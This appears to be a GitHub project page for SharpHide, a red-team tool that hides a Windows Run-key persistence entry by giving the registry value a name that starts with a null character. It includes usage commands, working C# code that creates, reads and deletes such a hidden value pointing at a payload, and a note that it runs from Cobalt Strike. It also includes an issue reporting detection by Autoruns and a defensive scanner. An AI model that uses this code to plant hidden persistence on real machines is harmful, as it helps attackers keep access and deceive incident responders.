
sharphide's Introduction

SharpHide

Just a nice persistence trick to confuse DFIR investigation. It uses the NtSetValueKey native API to create a hidden registry value (a "hidden key" in the tool's own terms) under the Run key: the value name is passed as a UNICODE_STRING whose buffer starts with a null character. Win32 registry functions treat value names as null-terminated strings, so they stop at that first character and cannot address, read, or delete the value by name, while the kernel and the native Nt* functions use the explicit Length field of the UNICODE_STRING and handle the name normally.

More info about this technique can be found in the following whitepaper: https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf

The tool creates the hidden value under the Run key of the hive matching its privileges: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run when running as a normal user, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run otherwise.
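The create, read-back and delete cycle described above, as an added example written for this page and not SharpHide's own source. It assumes Windows, .NET Framework 4.x or .NET 6+ on Windows, and write access to the current user's Run key; the value name "\0Hidden", the payload path, and the HiddenRunValue/PinName/Check names are this example's own choices. The Win32 lookup in Main goes through RegQueryValueEx, which truncates the name at the null, so it looks up the key's default value rather than the hidden one; the native query with the counted name finds it.

```csharp
// Added example (not SharpHide's code). Assumes Windows + .NET on Windows and HKCU write access;
// "\0Hidden" and the payload path are placeholders for this demonstration.
using System;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.Win32;

[StructLayout(LayoutKind.Sequential)]
struct UNICODE_STRING
{
    public ushort Length;        // in bytes, and the leading null character is counted
    public ushort MaximumLength;
    public IntPtr Buffer;
}

static class HiddenRunValue
{
    const uint REG_SZ = 1;
    const int KeyValuePartialInformation = 2;
    const uint STATUS_SUCCESS = 0x00000000;
    const uint STATUS_BUFFER_OVERFLOW = 0x80000005;
    const uint STATUS_BUFFER_TOO_SMALL = 0xC0000023;

    [DllImport("ntdll.dll")]
    static extern uint NtSetValueKey(IntPtr KeyHandle, ref UNICODE_STRING ValueName,
        uint TitleIndex, uint Type, byte[] Data, uint DataSize);
    [DllImport("ntdll.dll")]
    static extern uint NtQueryValueKey(IntPtr KeyHandle, ref UNICODE_STRING ValueName,
        int KeyValueInformationClass, IntPtr KeyValueInformation, uint Length, out uint ResultLength);
    [DllImport("ntdll.dll")]
    static extern uint NtDeleteValueKey(IntPtr KeyHandle, ref UNICODE_STRING ValueName);

    // Win32 registry calls take a null-terminated LPCWSTR and stop at the first '\0'; the native
    // API takes a counted UNICODE_STRING, so a name that starts with '\0' is legal there.
    static GCHandle PinName(string name, out UNICODE_STRING us)
    {
        GCHandle pin = GCHandle.Alloc(name.ToCharArray(), GCHandleType.Pinned);
        us = new UNICODE_STRING { Length = (ushort)(name.Length * 2), MaximumLength = (ushort)(name.Length * 2), Buffer = pin.AddrOfPinnedObject() };
        return pin;
    }

    static void Check(uint status, string call)
    {
        if (status != STATUS_SUCCESS) throw new InvalidOperationException($"{call} failed: 0x{status:X8}");
    }

    public static void Create(RegistryKey key, string hiddenName, string command)
    {
        GCHandle pin = PinName(hiddenName, out UNICODE_STRING name);
        try
        {
            byte[] data = Encoding.Unicode.GetBytes(command + "\0");   // REG_SZ keeps its terminator
            Check(NtSetValueKey(key.Handle.DangerousGetHandle(), ref name, 0, REG_SZ, data, (uint)data.Length), "NtSetValueKey");
        }
        finally { pin.Free(); }
    }

    public static string Read(RegistryKey key, string hiddenName)
    {
        GCHandle pin = PinName(hiddenName, out UNICODE_STRING name);
        IntPtr buf = IntPtr.Zero;
        try
        {
            IntPtr h = key.Handle.DangerousGetHandle();
            // First call only sizes the buffer; the kernel answers with a "too small" status.
            uint status = NtQueryValueKey(h, ref name, KeyValuePartialInformation, IntPtr.Zero, 0, out uint needed);
            if (status != STATUS_BUFFER_TOO_SMALL && status != STATUS_BUFFER_OVERFLOW) Check(status, "NtQueryValueKey");
            buf = Marshal.AllocHGlobal((int)needed);
            Check(NtQueryValueKey(h, ref name, KeyValuePartialInformation, buf, needed, out needed), "NtQueryValueKey");
            // KEY_VALUE_PARTIAL_INFORMATION: ULONG TitleIndex, ULONG Type, ULONG DataLength, UCHAR Data[]
            int dataLength = Marshal.ReadInt32(buf, 8);
            byte[] data = new byte[dataLength];
            Marshal.Copy(buf + 12, data, 0, dataLength);
            return Encoding.Unicode.GetString(data).TrimEnd('\0');
        }
        finally { if (buf != IntPtr.Zero) Marshal.FreeHGlobal(buf); pin.Free(); }
    }

    public static void Delete(RegistryKey key, string hiddenName)
    {
        GCHandle pin = PinName(hiddenName, out UNICODE_STRING name);
        try { Check(NtDeleteValueKey(key.Handle.DangerousGetHandle(), ref name), "NtDeleteValueKey"); }
        finally { pin.Free(); }
    }

    static void Main()
    {
        const string runKey = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
        const string hiddenName = "\0Hidden";              // leading null: unreachable through Win32 by name
        const string payload = @"C:\Windows\Temp\Bla.exe";   // placeholder path, as in the README
        using (RegistryKey key = Registry.CurrentUser.OpenSubKey(runKey, writable: true))
        {
            Create(key, hiddenName, payload);
            // GetValue uses RegQueryValueEx: the name is cut at '\0' and the default value is queried instead.
            Console.WriteLine("Win32 lookup : " + (key.GetValue(hiddenName) ?? "<not found>"));
            Console.WriteLine("Native lookup: " + Read(key, hiddenName));
            Delete(key, hiddenName);   // clean up through the native API, the only path that can name the value
        }
    }
}
```

Run it in a lab user context; it writes a real Run value and removes it again before exiting. If the process dies between Create and Delete, the value stays behind and has to be removed with the same native call, since Win32-based editors cannot name it.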

Usage

To create the hidden registry (Run) value:

SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe"

To create the hidden registry (Run) value with command-line arguments for the payload:

SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe" arguments="arg1 arg2"

To delete the hidden registry (Run) value:

SharpHide.exe action=delete

This tool also works with Cobalt Strike's execute-assembly.

Credits

Author: Cornelis de Plaa (@Cneelis) / Outflank

sharphide's People

Contributors

cn33liz

sharphide's Issues

Detected by AutoRuns on Windows 10

I compiled this with Visual Studio 2019 and then did the following inside PowerShell running as administrator:

.\SharpHide.exe action=create keyvalue="C:\Windows\System32\cmd.exe /c calc.exe"

I then ran autoruns64 as an administrator and saw that the entry got detected.

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.17763 N/A Build 17763

[screenshot: caught]
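The report above shows Autoruns listing the entry on build 17763. An investigator can make the same check without depending on any particular tool: NtEnumerateValueKey returns counted value names, so a name whose first character is '\0' is visible as such, whereas consumers that treat the name handed back by Win32 enumeration as a C string see an empty name. This scanner is an added example written for this page, not SharpHide's or the reporter's code; it assumes Windows and .NET on Windows, and the hive list, the 64 KB name buffer and the HiddenValueScanner name are this example's own choices.

```csharp
// Added example (not SharpHide's code). Assumes Windows + .NET on Windows; hive list and
// buffer size are assumptions made for this demonstration.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using Microsoft.Win32;

static class HiddenValueScanner
{
    const int KeyValueBasicInformation = 0;
    const uint STATUS_SUCCESS = 0x00000000;
    const uint STATUS_NO_MORE_ENTRIES = 0x8000001A;
    const uint BufSize = 64 * 1024;   // a value name is at most 16383 UTF-16 characters

    [DllImport("ntdll.dll")]
    static extern uint NtEnumerateValueKey(IntPtr KeyHandle, uint Index, int KeyValueInformationClass,
        IntPtr KeyValueInformation, uint Length, out uint ResultLength);

    // Value names under `key` exactly as the kernel stores them, embedded nulls included.
    public static List<string> NativeValueNames(RegistryKey key)
    {
        var names = new List<string>();
        IntPtr buf = Marshal.AllocHGlobal((int)BufSize);
        try
        {
            for (uint i = 0; ; i++)
            {
                uint status = NtEnumerateValueKey(key.Handle.DangerousGetHandle(), i, KeyValueBasicInformation, buf, BufSize, out uint len);
                if (status == STATUS_NO_MORE_ENTRIES) break;
                if (status != STATUS_SUCCESS) throw new InvalidOperationException($"NtEnumerateValueKey failed: 0x{status:X8}");
                // KEY_VALUE_BASIC_INFORMATION: ULONG TitleIndex, ULONG Type, ULONG NameLength (bytes), WCHAR Name[]
                int nameLength = Marshal.ReadInt32(buf, 8);
                names.Add(Marshal.PtrToStringUni(buf + 12, nameLength / 2));
            }
        }
        finally { Marshal.FreeHGlobal(buf); }
        return names;
    }

    // The SharpHide trick puts the null at the front; a legitimate value name never starts with one.
    public static bool IsHiddenName(string name) => name.Length > 0 && name[0] == '\0';

    static void Main()
    {
        const string runPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
        var hives = new[] { ("HKCU", Registry.CurrentUser), ("HKLM", Registry.LocalMachine) };
        foreach (var (label, hive) in hives)
        {
            using (RegistryKey key = hive.OpenSubKey(runPath))
            {
                if (key == null) continue;
                foreach (string name in NativeValueNames(key))
                {
                    if (IsHiddenName(name))
                        Console.WriteLine($"[!] {label}\\{runPath}: value name starts with \\0 ({name.Length} chars), invisible to Win32 callers by name");
                }
            }
        }
    }
}
```

Extend the hive list with RunOnce and the per-user hives under HKEY_USERS when sweeping a whole machine; reading HKLM\...\Run does not need elevation.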

How do you get the value?

I can try the valueNameTrick with or without the leading zeroes. Consistently returns:
ERROR_FILE_NOT_FOUND
2 (0x2)
The system cannot find the file specified.

```csharp
// Reads back a value whose name begins with null characters. The original version called the
// Win32 RegQueryValueEx with a pointer to a UNICODE_STRING: that API takes a null-terminated
// LPCWSTR, so "\0\0name" is cut to "" (the key's default value) and the lookup fails with
// ERROR_FILE_NOT_FOUND. Only the native NtQueryValueKey honours the counted name, so it is used here.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.Win32;

[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING
{
    public ushort Length;         // in bytes; the leading nulls are counted
    public ushort MaximumLength;
    public IntPtr Buffer;
}

public static class HiddenValueReader
{
    const int KeyValuePartialInformation = 2;
    const uint STATUS_SUCCESS = 0x00000000;
    const uint STATUS_BUFFER_OVERFLOW = 0x80000005;
    const uint STATUS_BUFFER_TOO_SMALL = 0xC0000023;

    [DllImport("ntdll.dll")]
    static extern uint NtQueryValueKey(IntPtr KeyHandle, ref UNICODE_STRING ValueName,
        int KeyValueInformationClass, IntPtr KeyValueInformation, uint Length, out uint ResultLength);

    public static T GetHiddenKeyValue<T>(string registryPath, string valueName)
    {
        // Must match exactly what was written, including how many leading nulls were used.
        string valueNameTrick = "\0\0" + valueName;

        bool IsSystem;
        using (var identity = System.Security.Principal.WindowsIdentity.GetCurrent())
        {
            IsSystem = identity.IsSystem;
        }

        // Same hive choice as the tool: HKLM when running as SYSTEM, otherwise HKCU.
        RegistryKey hive = IsSystem ? Registry.LocalMachine : Registry.CurrentUser;
        const string hkcuPrefix = @"HKEY_CURRENT_USER\";
        if (registryPath.StartsWith(hkcuPrefix, StringComparison.OrdinalIgnoreCase))
            registryPath = registryPath.Substring(hkcuPrefix.Length);
        Debug.WriteLine("[+] Using {0}\\{1}", IsSystem ? "HKLM" : "HKCU", registryPath);

        // Pin the name so the UNICODE_STRING buffer stays valid for the duration of the call.
        GCHandle pin = GCHandle.Alloc(valueNameTrick.ToCharArray(), GCHandleType.Pinned);
        IntPtr lpData = IntPtr.Zero;
        try
        {
            using (RegistryKey key = hive.OpenSubKey(registryPath, writable: false))
            {
                if (key == null)
                {
                    Debug.WriteLine("[!] Registry key not found.");
                    return default(T);
                }
                IntPtr regKeyHandle = key.Handle.DangerousGetHandle();

                UNICODE_STRING ValueName = new UNICODE_STRING
                {
                    Length = (ushort)(2 * valueNameTrick.Length),
                    MaximumLength = (ushort)(2 * valueNameTrick.Length),
                    Buffer = pin.AddrOfPinnedObject(),
                };

                // First call sizes the buffer (the native counterpart of ERROR_MORE_DATA).
                uint Status = NtQueryValueKey(regKeyHandle, ref ValueName, KeyValuePartialInformation, IntPtr.Zero, 0, out uint lpcbData);
                if (Status != STATUS_BUFFER_TOO_SMALL && Status != STATUS_BUFFER_OVERFLOW)
                {
                    Debug.WriteLine("[!] Value not found: 0x{0:X8}", Status);
                    return default(T);
                }

                lpData = Marshal.AllocCoTaskMem((int)lpcbData);
                Status = NtQueryValueKey(regKeyHandle, ref ValueName, KeyValuePartialInformation, lpData, lpcbData, out lpcbData);
                if (Status != STATUS_SUCCESS)
                {
                    Debug.WriteLine("[!] NtQueryValueKey failed: 0x{0:X8}", Status);
                    return default(T);
                }

                // KEY_VALUE_PARTIAL_INFORMATION: ULONG TitleIndex, ULONG Type, ULONG DataLength, UCHAR Data[]
                int dataLength = Marshal.ReadInt32(lpData, 8);
                byte[] data = new byte[dataLength];
                Marshal.Copy(lpData + 12, data, 0, dataLength);
                Debug.WriteLine("[+] Key value retrieved.");

                if (typeof(T) == typeof(string))
                    return (T)(object)Encoding.Unicode.GetString(data).TrimEnd('\0');
                if (typeof(T) == typeof(byte[]))
                    return (T)(object)data;
                throw new NotSupportedException("T must be string or byte[]");
            }
        }
        finally
        {
            if (lpData != IntPtr.Zero) Marshal.FreeCoTaskMem(lpData);
            pin.Free();
        }
    }
}
```
